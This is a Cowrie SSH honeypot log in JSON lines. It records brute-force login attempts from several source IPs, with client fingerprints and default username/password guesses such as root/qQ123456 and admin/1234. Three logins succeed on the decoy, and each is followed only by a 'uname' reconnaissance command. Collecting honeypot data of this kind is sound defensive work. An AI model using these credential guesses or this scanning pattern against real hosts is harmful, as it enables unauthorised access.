{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:02:06.626394Z","src_ip":"212.227.235.229","session":"9e315837bb51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39354,"dst_ip":"1.2.3.4","dst_port":22,"session":"d73914d038f9","protocol":"ssh","message":"New connection: 212.227.125.160:39354 (1.2.3.4:22) [session: d73914d038f9]","sensor":"my-vps","timestamp":"2025-08-31T03:02:13.800714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:02:13.801601Z","src_ip":"212.227.125.160","session":"d73914d038f9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:02:14.054632Z","src_ip":"212.227.125.160","session":"d73914d038f9"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"1qaz2wsx","message":"login attempt [ubuntu/1qaz2wsx] failed","sensor":"my-vps","timestamp":"2025-08-31T03:02:15.093754Z","src_ip":"212.227.125.160","session":"d73914d038f9"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:02:16.349086Z","src_ip":"212.227.125.160","session":"d73914d038f9"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50872,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee70f6f53d39","protocol":"ssh","message":"New connection: 217.72.205.35:50872 (1.2.3.4:22) [session: ee70f6f53d39]","sensor":"my-vps","timestamp":"2025-08-31T03:02:17.741653Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:02:17.742955Z","src_ip":"217.72.205.35","session":"ee70f6f53d39"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54680,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6eab19676fe","protocol":"ssh","message":"New connection: 212.227.235.229:54680 (1.2.3.4:22) [session: a6eab19676fe]","sensor":"my-vps","timestamp":"2025-08-31T03:02:21.115090Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":59350,"dst_ip":"1.2.3.4","dst_port":22,"session":"a158943bb232","protocol":"ssh","message":"New connection: 41.226.27.251:59350 (1.2.3.4:22) [session: a158943bb232]","sensor":"my-vps","timestamp":"2025-08-31T03:02:21.973861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:02:21.982453Z","src_ip":"41.226.27.251","session":"a158943bb232"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:02:22.019604Z","src_ip":"41.226.27.251","session":"a158943bb232"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T03:02:22.201758Z","src_ip":"41.226.27.251","session":"a158943bb232"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:02:23.493896Z","src_ip":"41.226.27.251","session":"a158943bb232"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:02:24.053621Z","src_ip":"212.227.235.229","session":"a6eab19676fe"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:02:24.054343Z","src_ip":"212.227.235.229","session":"a6eab19676fe"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"password1","message":"login attempt [ftpuser/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T03:02:28.699243Z","src_ip":"212.227.235.229","session":"a6eab19676fe"}
{"eventid":"cowrie.session.closed","duration":"10.7","message":"Connection lost after 10.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:02:31.841312Z","src_ip":"212.227.235.229","session":"a6eab19676fe"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":47446,"dst_ip":"1.2.3.4","dst_port":22,"session":"adf633674109","protocol":"ssh","message":"New connection: 41.226.27.251:47446 (1.2.3.4:22) [session: adf633674109]","sensor":"my-vps","timestamp":"2025-08-31T03:02:42.043592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:02:42.049842Z","src_ip":"41.226.27.251","session":"adf633674109"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:02:42.093058Z","src_ip":"41.226.27.251","session":"adf633674109"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-31T03:02:42.289498Z","src_ip":"41.226.27.251","session":"adf633674109"}
{"eventid":"cowrie.login.success","username":"root","password":"qQ123456","message":"login attempt [root/qQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:02:42.747436Z","src_ip":"212.227.125.160","session":"81ff22ac2578"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44882,"dst_ip":"1.2.3.4","dst_port":22,"session":"a90aa3a5d71e","protocol":"ssh","message":"New connection: 212.227.125.160:44882 (1.2.3.4:22) [session: a90aa3a5d71e]","sensor":"my-vps","timestamp":"2025-08-31T03:02:42.757672Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:02:43.343115Z","src_ip":"212.227.125.160","session":"a90aa3a5d71e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:02:43.343850Z","src_ip":"212.227.125.160","session":"a90aa3a5d71e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:02:43.471854Z","src_ip":"41.226.27.251","session":"adf633674109"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"password1","message":"login attempt [ftpuser/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T03:02:45.228266Z","src_ip":"212.227.125.160","session":"a90aa3a5d71e"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:02:46.548964Z","src_ip":"212.227.125.160","session":"a90aa3a5d71e"}
{"eventid":"cowrie.login.success","username":"root","password":"qQ123456","message":"login attempt [root/qQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:02:48.747890Z","src_ip":"212.227.235.229","session":"9e315837bb51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55984,"dst_ip":"1.2.3.4","dst_port":22,"session":"a28758d7376f","protocol":"ssh","message":"New connection: 212.227.125.160:55984 (1.2.3.4:22) [session: a28758d7376f]","sensor":"my-vps","timestamp":"2025-08-31T03:02:48.995537Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:02:52.268433Z","src_ip":"212.227.125.160","session":"81ff22ac2578"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:02:52.269192Z","src_ip":"212.227.125.160","session":"81ff22ac2578"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:02:54.859139Z","src_ip":"212.227.125.160","session":"a28758d7376f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:02:54.860178Z","src_ip":"212.227.125.160","session":"a28758d7376f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"6.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:02:58.480850Z","src_ip":"212.227.125.160","session":"81ff22ac2578"}
{"eventid":"cowrie.session.closed","duration":"89.5","message":"Connection lost after 89.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:02:58.481985Z","src_ip":"212.227.125.160","session":"81ff22ac2578"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:03:00.607675Z","src_ip":"212.227.235.229","session":"9e315837bb51"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:03:00.608352Z","src_ip":"212.227.235.229","session":"9e315837bb51"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":36018,"dst_ip":"1.2.3.4","dst_port":22,"session":"a80e81f66e0b","protocol":"ssh","message":"New connection: 41.226.27.251:36018 (1.2.3.4:22) [session: a80e81f66e0b]","sensor":"my-vps","timestamp":"2025-08-31T03:03:02.431308Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:03:02.440566Z","src_ip":"41.226.27.251","session":"a80e81f66e0b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:03:02.474999Z","src_ip":"41.226.27.251","session":"a80e81f66e0b"}
{"eventid":"cowrie.login.success","username":"root","password":"QWERTY123","message":"login attempt [root/QWERTY123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:03:02.648411Z","src_ip":"41.226.27.251","session":"a80e81f66e0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:03:03.207243Z","src_ip":"41.226.27.251","session":"a80e81f66e0b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:03:03.208140Z","src_ip":"41.226.27.251","session":"a80e81f66e0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:03:03.252624Z","src_ip":"41.226.27.251","session":"a80e81f66e0b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:03:03.254194Z","src_ip":"41.226.27.251","session":"a80e81f66e0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"5.6","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:03:06.182720Z","src_ip":"212.227.235.229","session":"9e315837bb51"}
{"eventid":"cowrie.session.closed","duration":"82.0","message":"Connection lost after 82.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:03:06.183780Z","src_ip":"212.227.235.229","session":"9e315837bb51"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink","message":"login attempt [flink/flink] failed","sensor":"my-vps","timestamp":"2025-08-31T03:03:10.445838Z","src_ip":"212.227.125.160","session":"a28758d7376f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41814,"dst_ip":"1.2.3.4","dst_port":22,"session":"780add2fcb22","protocol":"ssh","message":"New connection: 212.227.235.229:41814 (1.2.3.4:22) [session: 780add2fcb22]","sensor":"my-vps","timestamp":"2025-08-31T03:03:12.541572Z"}
{"eventid":"cowrie.session.closed","duration":"29.3","message":"Connection lost after 29.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:03:18.306502Z","src_ip":"212.227.125.160","session":"a28758d7376f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:03:19.804054Z","src_ip":"212.227.235.229","session":"780add2fcb22"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:03:19.805317Z","src_ip":"212.227.235.229","session":"780add2fcb22"}
